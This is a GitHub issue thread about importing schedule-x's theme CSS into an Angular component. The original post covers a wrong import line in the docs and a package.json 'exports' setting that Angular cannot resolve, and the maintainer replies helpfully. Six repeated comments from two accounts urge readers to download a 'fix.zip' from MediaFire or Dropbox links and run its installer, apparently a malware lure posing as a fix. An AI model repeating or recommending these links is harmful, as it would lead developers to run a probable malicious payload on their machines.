### ISSUE TITLE
Including `calendar.css` in an Angular component

### ISSUE THREAD

**Issue by klao** [schedule-x/schedule-x#609]
**Context:**

- Using schedule-x calendar as an angular component by following the docs

**Describe the bug**

The example code in https://schedule-x.dev/docs/frameworks/angular contains a line: `import './calendar.css'`, which is clearly an omission, and should be:
```ts
import '@schedule-x/theme-default/dist/index.css'
```
As in the example codes for the other framworks.

But this brings us to the second part of problem, which is more unique to Angular. Importing a CSS file in typescript is non-standard and depends on build systems. And, while it's widely supported in other frameworks, it's discouraged in modern Angular (as I understand it). It might work, but it might not, depending on the specifics of one's project. Instead, Angular has other mechanisms for including external styles:
- `@import` from main `styles.scss`, or an SCSS file of a component
- adding it to the `styles` array in `angular.json`

But if I try to do that, I run into this error from Angular:
```
✘ [ERROR] Could not resolve "@schedule-x/theme-default/dist/index.css"
  The path "./dist/index.css" is not currently exported by package "@schedule-x/theme-default":
  None of the conditions in the package definition ("import", "require") match any of the currently active conditions ("browser", "default", "less", "sass", "style"):
```
(Uninteresting context removed.)

The problem is, that in `@schedule-x/theme-default`'s `package.json` the CSS files are marked for export, but only for `import` and `require` condition, a thus are not allowed by Angular to be imported as style files.

**Fix recommendations**

1. Remove the unnecessary `exports` conditions in `@schedule-x/theme-default`. Just use:

```json
  "exports": {
    "./dist/index.css": "./dist/index.css",
    "./dist/date-picker.css": "./dist/date-picker.css",
    "./dist/time-picker.css": "./dist/time-picker.css",
    "./dist/calendar.css": "./dist/calendar.css"
  }
```

2. Fix the `import` line in the example code.
3. Mention (maybe in a comment next to that line), that instead one can `@import` it from `styles.scss` or add it to `angular.json`.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by tomosterlund** [comment]
Thanks a lot. I didn't know about styles property in `angular.json` (I'm not very seasoned in Angular)

**Comment by klao** [comment]
Thank you!
